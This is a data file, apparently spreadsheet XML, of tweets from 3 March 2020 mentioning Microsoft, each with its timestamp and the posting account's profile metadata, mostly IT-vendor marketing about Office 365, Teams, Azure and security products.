    <t>The global average cost of a #cyberattack is $3.6 million. Yikes! But don't worry, we can help protect your business. Check out this e-book from #Microsoft to identify the three most common threats: viruses, phishing, and ransomware. https://t.co/NDYw8vCaq9</t>
  </si>
  <si>
    <t>Tue Mar 03 11:08:28 +0000 2020</t>
  </si>
  <si>
    <t>Make life easier for your teachers with these simple, time-saving #Windows10 shortcuts.      #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/PZpipdFFfO</t>
  </si>
  <si>
    <t>{'id': 161188101, 'id_str': '161188101', 'name': 'Tabarin Consulting', 'screen_name': 'tabarinconsult', 'location': 'Nairobi, Kenya', 'description': 'Providing web-based services, enterprise wide database development and database management, education technologies and local Certiport Inc. partner in Kenya.', 'url': 'http://t.co/SddmEVqsgX', 'entities': {'url': {'urls': [{'url': 'http://t.co/SddmEVqsgX', 'expanded_url': 'http://www.tabarinconsulting.com', 'display_url': 'tabarinconsulting.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1596, 'friends_count': 2154, 'listed_count': 10, 'created_at': 'Wed Jun 30 06:00:01 +0000 2010', 'favourites_count': 349, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2474,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'http://pbs.twimg.com/profile_images/378800000616937958/f1173b1d33aa355716671ea65a8d9cb4_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000616937958/f1173b1d33aa355716671ea65a8d9cb4_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/161188101/1536246394',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</si>
  <si>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11:08:17 +0000 2020</t>
  </si>
  <si>
    <t>Airport security officer-turned-developer helps Heathrow book a faster journey to #DigitalTransformation with #Microsoft #PowerPlatform. Watch the video. https://t.co/AFgI7xBfW6</t>
  </si>
  <si>
    <t>{'id': 1092643618123206658, 'id_str': '1092643618123206658', 'name': 'Afrilogic Solutions', 'screen_name': 'afrilogic', 'location': 'Accra, Ghana', 'description': 'Providing world-class IT solutions using creative and innovative tools, people and technology with no compromise but exceeding expectations.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 16, 'friends_count': 0, 'listed_count': 2, 'created_at': 'Tue Feb 05 04:38:33 +0000 2019', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 444, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1092643913096081408/6hUXVFhY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1092643913096081408/6hUXVFhY_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1092643618123206658/1549341674',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</si>
  <si>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11:07:43 +0000 2020</t>
  </si>
  <si>
    <t>Is your business in need of an updated communication platform? How about an easier way for employees to exchange ideas and drive innovation? Check out this video to see how #Teamworksolutions from #Microsoft can help your teams better communicate. https://t.co/5tSP61Adf5</t>
  </si>
  <si>
    <t>Tue Mar 03 11:07:42 +0000 2020</t>
  </si>
  <si>
    <t>Have you always dreamed of working from the beach? Now you can, with our #Teamworksolutions from #Microsoft. What are you waiting for? Check out this video to learn how you can empower your teams to work from virtually anywhere, on any device. https://t.co/wDi3MebL6T</t>
  </si>
  <si>
    <t>{'id': 1095367353926410240, 'id_str': '1095367353926410240', 'name': 'JM Cloud Solutions', 'screen_name': 'JMCloudSolution', 'location': 'RibeirÃ£o Preto, Brasil', 'description': 'Cuidamos de sua infraestrutura de datacenter e nuvem, deixe de se preocupar, foque em seu negÃ³cio.', 'url': 'https://t.co/sE0cD1avPs', 'entities': {'url': {'urls': [{'url': 'https://t.co/sE0cD1avPs', 'expanded_url': 'https://www.jmcloud.com.br', 'display_url': 'jmcloud.com.br', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 59, 'listed_count': 0, 'created_at': 'Tue Feb 12 17:01:42 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 182, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1139141406063284225/i_e9_NwR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1139141406063284225/i_e9_NwR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1095367353926410240/1560428532',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</si>
  <si>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11:05:04 +0000 2020</t>
  </si>
  <si>
    <t>[AWSUpdates] Customers can now sign-on to Amazon Redshift cluster with Microsoft Azure Active Directory(AD) identities.
 https://t.co/dWW9YQyq9x #AWS @awscloud #Amazon #Redshift #Cloud #CloudComputing #Analytics #Data #Azure #Microsoft #Cluster</t>
  </si>
  <si>
    <t>{'id': 309638145, 'id_str': '309638145', 'name': 'Micropole BeLux', 'screen_name': 'MicropoleBeLux', 'location': 'Zaventem, BelgiÃ«', 'description': 'Micropole helps you unlock the value of your #data, transforming it into a tangible business outcome. #InnovativePeople', 'url': 'http://t.co/5D2V6x4gtC', 'entities': {'url': {'urls': [{'url': 'http://t.co/5D2V6x4gtC', 'expanded_url': 'http://www.micropole.be', 'display_url': 'micropole.be', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 272, 'friends_count': 246, 'listed_count': 44, 'created_at': 'Thu Jun 02 12:24:42 +0000 2011', 'favourites_count': 1684, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1852,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'http://pbs.twimg.com/profile_images/1052904664386154497/jJPl0ztZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1052904664386154497/jJPl0ztZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/309638145/1539866991',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</si>
  <si>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11:04:35 +0000 2020</t>
  </si>
  <si>
    <t>We give new life to used yachts. We evaluate the necessary works to make a requalification program for your boat. info@elicayachts.it #yacht #yachts #boats #nautica #Marine #Italy #Italia #Milano #Europa #barche #holiday #Summer2020 #03Mar #azimut #microsoft #3Marzo #yachting https://t.co/Lz2f7Z6Di1</t>
  </si>
  <si>
    <t>{'id': 869470648518799361, 'id_str': '869470648518799361', 'name': 'ELICAYACHTS', 'screen_name': 'ELICA_Yachts', 'location': 'Olbia, Costa Smeralda ', 'description': 'á´¡á´‡ Ò“ÉªÉ´á´… á´›Êœá´‡ á´˜á´‡Ê€Ò“á´‡á´„á´› Êá´€á´„Êœá´› Ò“á´Ê€ Êá´á´œ!', 'url': 'https://t.co/BUDlB9c2IQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/BUDlB9c2IQ', 'expanded_url': 'https://www.elicayachts.it/it/', 'display_url': 'elicayachts.it/it/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 70, 'friends_count': 551, 'listed_count': 1, 'created_at': 'Tue May 30 08:28:51 +0000 2017', 'favourites_count': 109, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1193893754840735745/yEBGgFFh_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1193893754840735745/yEBGgFFh_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/869470648518799361/1573485895',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</si>
  <si>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11:04:32 +0000 2020</t>
  </si>
  <si>
    <t>Investing in a cybersecurity program is no longer optional, no matter the size of your business. Check out this infographic to learn more about how you can protect your business with our #Microsoft #security solutions. https://t.co/zId6YA2e5M</t>
  </si>
  <si>
    <t>{'id': 230535948, 'id_str': '230535948', 'name': 'Assista.Plus Your Social Compass', 'screen_name': 'AssistaPlus', 'location': 'BelgiÃ«', 'description': 'Empowering Innovative Solutions through Customer Focused Strategy - Creating a professional community to connect caregivers with the people', 'url': 'https://t.co/zZeqssrGKP', 'entities': {'url': {'urls': [{'url': 'https://t.co/zZeqssrGKP', 'expanded_url': 'http://assista.plus', 'display_url': 'assista.plus', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 66, 'friends_count': 341, 'listed_count': 10, 'created_at': 'Sat Dec 25 22:14:33 +0000 2010', 'favourites_count': 11, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1171,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'http://pbs.twimg.com/profile_images/1223623874237149186/kSzLyGlm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1223623874237149186/kSzLyGlm_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/230535948/1580569980',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</si>
  <si>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11:03:18 +0000 2020</t>
  </si>
  <si>
    <t>What can your inbox do for you? With the interconnected power of #Microsoft #Dynamics365, the information you need is only a click away. Saving you time and creating a better experience for your customers. https://t.co/H9YSTGtBCd</t>
  </si>
  <si>
    <t>{'id': 171410781, 'id_str': '171410781', 'name': 'ACTIVâ€™H.A - Cercle Business', 'screen_name': 'ACTIVHA', 'location': 'FRANCE', 'description': 'Faire faire des Ã©conomies aux entreprises - CrÃ©er un revenu complÃ©mentaire pour les particuliers qui les aident', 'url': 'https://t.co/hfvvWnIIY7', 'entities': {'url': {'urls': [{'url': 'https://t.co/hfvvWnIIY7', 'expanded_url': 'https://activ-ha.com', 'display_url': 'activ-ha.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 102, 'friends_count': 9, 'listed_count': 2, 'created_at': 'Tue Jul 27 08:19:16 +0000 2010', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 757,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'http://pbs.twimg.com/profile_images/1034369410692202496/Tq3liDRM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1034369410692202496/Tq3liDRM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/171410781/1535448463',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</si>
  <si>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11:03:02 +0000 2020</t>
  </si>
  <si>
    <t>Learn about Data Migration Assistant
#IFITech #DataMigration #Assistant #Microsoft #Azure 
https://t.co/5BHFdZ8R73</t>
  </si>
  <si>
    <t>Tue Mar 03 11:01:24 +0000 2020</t>
  </si>
  <si>
    <t>How Social Determinants of Health Impact Pediatric No-Show Rates
https://t.co/Dk5VK8wInf
#sdoh #socialdeterminantsofhealth #gohealthhero #pophealth #health #wellbeing #valuebased #healthit #salesforce #cerner #epic #microsoft #Z55 #Z65</t>
  </si>
  <si>
    <t>Tue Mar 03 11:01:12 +0000 2020</t>
  </si>
  <si>
    <t>Home and End in Word: Jump to the end of the line by pressing the End key.  Use Home to jump to the beginning. #Microsoft #Office365</t>
  </si>
  <si>
    <t>Tue Mar 03 11:00:45 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft has recently shared security news around Microsoft Threat Protection hitting general availability. 
#MicrosoftThreatProtection uses AI to help security teams prioritize and act on the various alerts across their organisations. 
https://t.co/FIz8dxPJoE</t>
  </si>
  <si>
    <t>Tue Mar 03 11:00:06 +0000 2020</t>
  </si>
  <si>
    <t>#Accenture dramatically improves #mobile #productivity &amp;amp; #collaboration with #Microsoft #Outlook for #iOS &amp;amp; #Android - Thomas Bruss #Ireland https://t.co/GppSjevOMP #MSFTAdvocate</t>
  </si>
  <si>
    <t>Tue Mar 03 10:59:07 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> Did you know there was a way of managing your workforce's attendance through the Microsoft suite that you're already signed up to? 
Read more 
https://t.co/Gn9AT2ALfz
#timeclock #microsoft #microsoftteams</t>
  </si>
  <si>
    <t>{'id': 914519470051414018, 'id_str': '914519470051414018', 'name': 'Highstream Solutions', 'screen_name': 'highstreamsol', 'location': 'Chester, England', 'description': 'A growing and agile company providing effective IT services and support.', 'url': 'https://t.co/SbHIHKi41h', 'entities': {'url': {'urls': [{'url': 'https://t.co/SbHIHKi41h', 'expanded_url': 'http://www.highstream.co.uk', 'display_url': 'highstream.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 56, 'friends_count': 121, 'listed_count': 1, 'created_at': 'Sun Oct 01 15:56:47 +0000 2017', 'favourites_count': 63, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 122, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/914585668365553664/TRa776IO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/914585668365553664/TRa776IO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/914519470051414018/1506873872',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</si>
  <si>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10:55:05 +0000 2020</t>
  </si>
  <si>
    <t>Warning Issued For Millions Of #Microsoft #Windows10 Users via @Forbes https://t.co/DnS7v78ucf via @Forbes https://t.co/o3HDANI9tN</t>
  </si>
  <si>
    <t>Tue Mar 03 10:54:51 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft's dark-themed #keyboard is launched through #SwiftkeyApp, available for #Android. @Microsoft 
https://t.co/K0D3jc3Nqe</t>
  </si>
  <si>
    <t>Tue Mar 03 10:50:03 +0000 2020</t>
  </si>
  <si>
    <t>24 Clickable Banner Ads Examples (And Why They Work!) https://t.co/gjmAyYDHec #GoogleAds #FacebookAds #Microsoft #ppc</t>
  </si>
  <si>
    <t>Tue Mar 03 10:49:04 +0000 2020</t>
  </si>
  <si>
    <t>Day 2 @ Geek Week!
Bjorn Axell @bjornaxel from Microsoft is guesting speaking today. About #Microsoft Threat Protection.
#cybersecurity #threathprotection #geekweek #truesec https://t.co/myWr96qb5G</t>
  </si>
  <si>
    <t>{'id': 357507880, 'id_str': '357507880', 'name': 'TRUESEC', 'screen_name': 'Truesec', 'location': '', 'description': 'We are true experts in cyber security, IT infrastructure and secure development. Areas in which we offer high-quality consultant services, trainings &amp; speakers.', 'url': 'https://t.co/DfjTbuCI2r', 'entities': {'url': {'urls': [{'url': 'https://t.co/DfjTbuCI2r', 'expanded_url': 'https://www.truesec.com', 'display_url': 'truesec.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1937, 'friends_count': 224, 'listed_count': 83, 'created_at': 'Thu Aug 18 13:40:20 +0000 2011', 'favourites_count': 4999, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4244,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'http://pbs.twimg.com/profile_images/932641990415716352/OU6bBlTa_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/932641990415716352/OU6bBlTa_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/357507880/1510847414', 'profile_link_color': '22B7E8', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '000000', 'profile_text_color': 'AFAFAF', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 10:46:32 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">@CondorCares @Condor my flight to #Seattle on 14th March just lost its purpose since #Microsoft annual #MVPSummit is cancelled do to #COVID19US. I was offered just 10% refund when called infoline.
Anyhow I can get a full refund? Help </t>
  </si>
  <si>
    <t>{'id': 837594924799377409, 'id_str': '837594924799377409', 'name': 'Tomasz Poszytek, MVP @MVPSummit ðŸ‡ºðŸ‡²', 'screen_name': 'TomaszPoszytek', 'location': 'Warsaw, Poland', 'description': 'Microsoft MVP | #Nintex vTE | #PowerPlatform expert. IT PRO with over 10 years of experience. #SPSWarsaw co-organizer, international speaker.', 'url': 'https://t.co/iKJeHH2BLG', 'entities': {'url': {'urls': [{'url': 'https://t.co/iKJeHH2BLG', 'expanded_url': 'https://poszytek.eu', 'display_url': 'poszytek.eu', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1338, 'friends_count': 406, 'listed_count': 14, 'created_at': 'Fri Mar 03 09:26:06 +0000 2017', 'favourites_count': 5664, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4375,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'http://pbs.twimg.com/profile_images/1089525345366220801/Ifjr9Maw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1089525345366220801/Ifjr9Maw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/837594924799377409/1548598290',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</si>
  <si>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10:45:41 +0000 2020</t>
  </si>
  <si>
    <t>#BestPractices for bringing #AugmentedReality applications to the field
=&amp;gt;  Learn how industrial giant #ABB is using #Unity and #Microsofts Mixed Reality Toolkit (#MRTK) to transform field maintenance procedures into a completely...https://t.co/z3Nsm8p4sY https://t.co/wEWez1X6tO</t>
  </si>
  <si>
    <t>{'id': 207673942, 'id_str': '207673942', 'name': 'Kai WÃ¤hner', 'screen_name': 'KaiWaehner', 'location': 'Germany', 'description': 'Technology Evangelist with Focus on Integration, Event Processing, Big Data, Analytics, Machine Learning, Cloud-Native Microserices and Blockchain', 'url': 'https://t.co/7nTApzXoPu', 'entities': {'url': {'urls': [{'url': 'https://t.co/7nTApzXoPu', 'expanded_url': 'http://www.kai-waehner.de', 'display_url': 'kai-waehner.de', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1848, 'friends_count': 104, 'listed_count': 552, 'created_at': 'Mon Oct 25 20:22:32 +0000 2010', 'favourites_count': 49, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8195,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'http://pbs.twimg.com/profile_images/1152411806/70768_702410504_6783159_q_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1152411806/70768_702410504_6783159_q_normal.jpg',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</si>
  <si>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10:44:24 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">
In this course, learn the best way of word processing and document creation.
.
#Bahrain #Manama #business #report #microsoft #word #writing #professional #work #free #skills #english https://t.co/neuFMcP1BT</t>
  </si>
  <si>
    <t>{'id': 1049638502621687808, 'id_str': '1049638502621687808', 'name': 'Training Plus Institute', 'screen_name': 'trainingplusbh', 'location': 'Bahrain', 'description': 'Training Plus Institute is a leader in training technology and customized learning solutions since 1996', 'url': 'https://t.co/q5IcBWdYA9', 'entities': {'url': {'urls': [{'url': 'https://t.co/q5IcBWdYA9', 'expanded_url': 'https://forms.gle/UVWGCCthF4A3LYLP9', 'display_url': 'forms.gle/UVWGCCthF4A3LYâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 9, 'friends_count': 0, 'listed_count': 0, 'created_at': 'Tue Oct 09 12:31:35 +0000 2018', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1205124060428017665/tBBqi_VH_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1205124060428017665/tBBqi_VH_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1049638502621687808/1576158943',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</si>
  <si>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10:41:00 +0000 2020</t>
  </si>
  <si>
    <t>Would you like to strengthen the collaboration, flexibility and mobility in your teams? Well, Office 365 could be the answer! Find out more about it here  https://t.co/HLCas8ONSQ
#office365 #microsoft #employees #teams https://t.co/hkTP8sg8OJ</t>
  </si>
  <si>
    <t>{'id': 103731233, 'id_str': '103731233', 'name': 'entrust IT Group', 'screen_name': 'EntrustIT', 'location': 'Hampshire, UK | Boston, MA.', 'description': 'We solve problems using technology.', 'url': 'https://t.co/AuLYpsCwJB', 'entities': {'url': {'urls': [{'url': 'https://t.co/AuLYpsCwJB', 'expanded_url': 'http://www.entrustit.co.uk', 'display_url': 'entrustit.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1119, 'friends_count': 1454, 'listed_count': 25, 'created_at': 'Mon Jan 11 02:29:35 +0000 2010', 'favourites_count': 130, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1938,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'http://pbs.twimg.com/profile_images/948129735892140032/rkALa0CD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/948129735892140032/rkALa0CD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/103731233/1514888242', 'profile_link_color': '3E4F6D',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</si>
  <si>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10:38:37 +0000 2020</t>
  </si>
  <si>
    <t>Hi MSPs,  We have a Solution for "Upgrade Windows 7 to Windows 10" with ConnectWise Automate?
Get Up to 50% on Windows 7 Upgrade Script!
#Labtech #SankalpIT #Windows7 #Windows10 #Microsoft #MSP #itservices #australia #SankalpITConsulting 
Learn More: https://t.co/XjQTmJI6ol</t>
  </si>
  <si>
    <t>Tue Mar 03 10:36:25 +0000 2020</t>
  </si>
  <si>
    <t>Xbox Series X Quick Resume Is Already Out (Super Easy) https://t.co/vQoWf57yqs #Microsoft #XboxSeriesX #XboxOneX #nextgen #ps5
#coronavirus #gaming #nextgen</t>
  </si>
  <si>
    <t>{'id': 4673846618, 'id_str': '4673846618', 'name': 'Itâ€™s Me Jack Jack', 'screen_name': 'ntiran2x', 'location': 'Michigan, USA', 'description': 'what can I say itâ€™s me vs the universe', 'url': 'https://t.co/WattoOLEH8', 'entities': {'url': {'urls': [{'url': 'https://t.co/WattoOLEH8', 'expanded_url': 'http://ntiravision.com', 'display_url': 'ntiravision.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 88, 'friends_count': 219, 'listed_count': 2, 'created_at': 'Tue Dec 29 17:21:09 +0000 2015', 'favourites_count': 1709, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1235765569426731009/UR47NPM2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235765569426731009/UR47NPM2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4673846618/1583276144',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</si>
  <si>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10:34:52 +0000 2020</t>
  </si>
  <si>
    <t>This simple process reduces "MAN-IN-THE-MIDDLE" attacks very easily in our opinion!
#teal #dusseldorf #consulting #itconsulting #security #infosec #cybersecurity #microsoft #esae #redteam #blueteam #bloodhound #mimikatz #infografic #infografik #cleansourceprinciple #cleansource https://t.co/MTg42640da</t>
  </si>
  <si>
    <t>{'id': 991635485113180160, 'id_str': '991635485113180160', 'name': 'TEAL', 'screen_name': 'TEAL_Technology', 'location': 'Duisburger StraÃŸe 91 | 40479 ', 'description': 'Your trust in us as Trusted Advisor for Infrastructure Security\nhas a color and a name TEAL', 'url': 'https://t.co/kTjEQtew0T', 'entities': {'url': {'urls': [{'url': 'https://t.co/kTjEQtew0T', 'expanded_url': 'https://teal-consulting.de', 'display_url': 'teal-consulting.de', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 18, 'friends_count': 61, 'listed_count': 1, 'created_at': 'Wed May 02 11:08:18 +0000 2018', 'favourites_count': 108, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 120, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1208385455995203584/teWxvxkT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1208385455995203584/teWxvxkT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/991635485113180160/1576936537',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</si>
  <si>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10:31:39 +0000 2020</t>
  </si>
  <si>
    <t>Double act Moreno Vardanega and Umar Bari take questions on their amazing #Microsoft #customerinsights session. Great engagement from the #Aberdeen #DynamicsForum audience. Keep the conversation going, Team! 
@inc_group_uk  #Incremental #data https://t.co/eCKsmF4nWQ</t>
  </si>
  <si>
    <t>Tue Mar 03 10:31:31 +0000 2020</t>
  </si>
  <si>
    <t>For those that are unaware late 2019, #Microsoft began auto-integrating LinkedIn with the corporate #Azure AD. While the integration bears many benefits, it could also lead to cyber security implications within the organisation. Read in full at https://t.co/jeBhLFORM1 https://t.co/izUBUu2Msd</t>
  </si>
  <si>
    <t>Tue Mar 03 10:30:23 +0000 2020</t>
  </si>
  <si>
    <t>Hire the right .NET developers to build reliable. NET apps. Reach out to Openwave and hire professional #dotnetDevelopers with extensive experience right away!
Read More https://t.co/PMTwwje54J
#customwebapplication #aspnetapplication #microsoft #netdevelopmentcompanies #Malay https://t.co/5WRqkeCdJp</t>
  </si>
  <si>
    <t>{'id': 2493847351, 'id_str': '2493847351', 'name': 'Openwave Computing (M) Sdn Bhd', 'screen_name': 'owc_my', 'location': 'Malaysia', 'description': 'We are the Top Software Development Company. We provide end-to-end solutions with expertise in PHP, .NET, Python, Native &amp; Hybrid Apps, eCommerce, and more.', 'url': 'https://t.co/erHiOzRKy3', 'entities': {'url': {'urls': [{'url': 'https://t.co/erHiOzRKy3', 'expanded_url': 'http://www.openwavecomp.com.my', 'display_url': 'openwavecomp.com.my', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 789, 'friends_count': 1500, 'listed_count': 142, 'created_at': 'Wed May 14 07:32:39 +0000 2014', 'favourites_count': 1417, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3957,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'http://pbs.twimg.com/profile_images/989074326552043523/v7yDJkrT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/989074326552043523/v7yDJkrT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2493847351/1532417977',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</si>
  <si>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10:30:15 +0000 2020</t>
  </si>
  <si>
    <t>@Microsoft launches start-ups initiative to empower social entrepreneurs
https://t.co/DPfsVxwctp
#KENYA #ACCELERATOR #Microsoft #GIANTS #INVESTMENT #Startups</t>
  </si>
  <si>
    <t>{'id': 1069502003821260805, 'id_str': '1069502003821260805', 'name': 'Volanews', 'screen_name': 'Volanews', 'location': '', 'description': 'We particularly focus on delivering news on innovation trends and products, investment and startups, cool technologies, business models, trade and policy.', 'url': 'https://t.co/Sd90F7tccf', 'entities': {'url': {'urls': [{'url': 'https://t.co/Sd90F7tccf', 'expanded_url': 'http://www.volanews.com', 'display_url': 'volanews.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 119, 'friends_count': 145, 'listed_count': 5, 'created_at': 'Mon Dec 03 08:02:02 +0000 2018', 'favourites_count': 31, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6029, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1087622058584956928/AuTOXw_p_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1087622058584956928/AuTOXw_p_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1069502003821260805/1548144307',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</si>
  <si>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10:30:01 +0000 2020</t>
  </si>
  <si>
    <t>Often associated with doomsday scenarios, AI is helping working parents manage work/life balance. #Microsoft https://t.co/JTyALTYE54</t>
  </si>
  <si>
    <t>Tue Mar 03 10:25:18 +0000 2020</t>
  </si>
  <si>
    <t>. @gdprqueen Stefanie making it clear how users of #Microsoft cloud can vastly improve their #compliance score through inbuilt tools and sleep better at night. https://t.co/KfS7qJ0OgN</t>
  </si>
  <si>
    <t>{'id': 47630832, 'id_str': '47630832', 'name': 'Jason Fitzgerald', 'screen_name': 'jay_fitzgerald', 'location': 'Liverpool', 'description': 'IT infrastructure consultant and cyber security advisor @gardnersystems #netappunited, #blogger https://t.co/TOz4NOjgFC, automation fan, #biker #rollerderby', 'url': 'https://t.co/xdHT7eMZOs', 'entities': {'url': {'urls': [{'url': 'https://t.co/xdHT7eMZOs', 'expanded_url': 'http://www.gardnersystems.co.uk', 'display_url': 'gardnersystems.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/TOz4NOjgFC', 'expanded_url': 'http://bwtf.wordpress.com', 'display_url': 'bwtf.wordpress.com', 'indices': [96, 119]}]}}, 'protected': False, 'followers_count': 467, 'friends_count': 881, 'listed_count': 35, 'created_at': 'Tue Jun 16 14:03:53 +0000 2009', 'favourites_count': 474, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3297, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'C20E0E', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme7/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme7/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1069552604676526080/tBvQ8CzP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1069552604676526080/tBvQ8CzP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/47630832/1529425079', 'profile_link_color': '067A76',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</si>
  <si>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Tue Mar 03 10:25:14 +0000 2020</t>
  </si>
  <si>
